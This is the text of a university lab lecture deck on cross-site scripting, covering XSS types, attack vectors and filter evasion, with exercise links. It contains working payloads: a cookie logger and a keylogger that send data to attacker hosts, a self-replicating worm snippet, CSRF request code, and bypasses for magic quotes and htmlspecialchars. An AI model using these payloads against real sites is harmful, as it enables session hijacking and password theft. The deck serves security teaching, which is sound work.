XSS: Cross-Site Scripting
Louis Feuvrier, Bruno Pujos, Pierre Rovis
LSE, EPITA Systems Lab, http://lse.epita.fr/

Table of Contents
  1 Introduction: introduction, examples, stored / reflected / DOM XSS, exercise
  2 Attack vectors: cookie stealing, CSRF, XSS worms, keylogger
  3 Prevention & Evasion

1 Introduction

Introduction
  - Goal: execute script on the client side, in the victim's browser, inside the origin of the vulnerable website
  - Abuses the user's trust in a website (whereas CSRF abuses the website's trust in the user's browser)

Basic example
    <script>alert('Warning! XSS!')</script>
  - The most basic example there is: both HTML (the tag) and JavaScript (its content)
  - Most used detection snippets: alert('xss'); document.write('xss');

Foreign script
    <script src='http://malicious.net/dobad.js'></script>
  - Executes a script larger than what the input field allows
  - The script can be updated after posting: the injected tag never changes, its content does

Attribute example
    <body onload="alert('xss');"></body>
  - No <script> tag at all: an event-handler attribute is enough, so a filter that only looks for <script> misses it

Stored XSS
  - JavaScript code stored on the website's servers (database, log files that get rendered, ...)
  - Permanent: affects every user exposed to the stored data
Reflected XSS
  - The payload is part of the request the user sends to the website (URL parameter, form field) and is echoed back in the response
  - Possible because the user trusts the website enough to follow a crafted link to it
  - Targets one user in particular: whoever opens the attacker's link

Exercise: basic stored XSS
  http://louis.feuvrier.org/supinternet/xss101.zip
  http://louis.feuvrier.org/supinternet/xss101.tar.gz

2 Attack vectors

Quick list
  - Cookie stealing
  - CSRF
  - XSS worms
  - Keylogging
  - ...

Cookie stealing
  - Retrieve the administrator's cookie to hijack the session
  - Injection point: http://someblog.com/guestbook.php
  - Cookie logger script hosted at http://addr/log.php
    <script>
    // Sends the victim to the logger with the cookies in the query string
    location.href = 'http://addr/log.php?val=' + document.cookie
    </script>
  - Caveat: document.cookie only exposes cookies without the HttpOnly flag, and the redirect is visible to the victim; a hidden request (new Image().src, as in the keylogger below) is stealthier

CSRF
  - As seen previously: forge a POST request, sent from the victim's browser with the victim's cookies
    var post_data = 'name=value';
    var xmlhttp = new XMLHttpRequest();   // on Mozilla and modern browsers
    // new ActiveXObject("Microsoft.XMLHTTP"); on old IE
    xmlhttp.open("POST", 'http://url/path/file.ext', true);
    // ...
    xmlhttp.send(post_data);
  - Because the script runs inside the site's own origin, it can also read an anti-CSRF token from the page before sending: XSS defeats CSRF protections

XSS Worms
  - Self-replicating: the payload copies its own source into whatever the victim posts (Samy worm, MySpace, 2005)
    <script id=worm>
    // 'balise' is French for 'tag': grab the script element itself
    var balise = document.getElementById('worm');
    // Build the opening and closing tags with unescape() so that the literal
    // string </script> never appears in the source and cannot end the script block
    var str = unescape('%3Cscript id=worm%3E');
    str = str.concat(balise.innerHTML);
    str = str.concat(unescape('%3C/script%3E'));
    alert(str);   // str is the complete payload, ready to be re-posted
    </script>

Keylogger
  - Sometimes more useful to retrieve passwords instead of cookies
    var keys = '';
    document.onkeypress = function(e) {
      // ...
      var key = e.keyCode ? e.keyCode : e.charCode;
      keys += String.fromCharCode(key);   // append the typed character
    }
    window.setInterval(function() {
      // Exfiltrate through an image request: no navigation, nothing visible
      new Image().src = 'http://key.log/ger.php?keys=' + encodeURIComponent(keys);
      keys = '';
    }, 10000)

Exercise: basic reflected XSS
  http://louis.feuvrier.org/supinternet/xss102.zip
  http://louis.feuvrier.org/supinternet/xss102.tar.gz

3 Prevention & Evasion

Quick list
  - magic quotes
  - htmlspecialchars
  - htmlentities
  - ...

magic quotes
  - PHP's magic_quotes_gpc prepends a backslash to every quote in GET, POST and cookie data (deprecated in PHP 5.3, removed in 5.4)
  - Breaks this payload: <script>alert('xss')</script> becomes alert(\'xss\'), a JavaScript syntax error
  - Bypass without a single quote: <script>alert(String.fromCharCode(88, 83, 83))</script>
  - Length problem for long strings and limited input capabilities (fromCharCode payloads are long)
  - Solved with foreign scripting: load the real payload from an external file
  - If the domain name of the foreign script is too long, use an IP address instead

htmlspecialchars
  - Use htmlspecialchars everywhere, all problems solved
  - Except... it only encodes &, <, >, " (and ' with ENT_QUOTES), which does nothing for data that lands in a JavaScript context:
    <?php
    $userinput = "javascript:alert(String.fromCharCode(88, 83, 83));";
    $sanitized = htmlspecialchars($userinput);
    ?>
    <body onload="<?php echo $sanitized; ?> ">this is my webpage!</body>
  - $sanitized is identical to $userinput: none of its characters is special to HTML, and the attribute value is JavaScript, so the alert fires on load (javascript: is just a label there)
  - Encoding must match the output context (HTML body, attribute, JavaScript string, URL); htmlspecialchars covers only the HTML ones

Questions?

Exercise: XSS 103
  http://louis.feuvrier.org/supinternet/xss103.zip
  http://louis.feuvrier.org/supinternet/xss103.tar.gz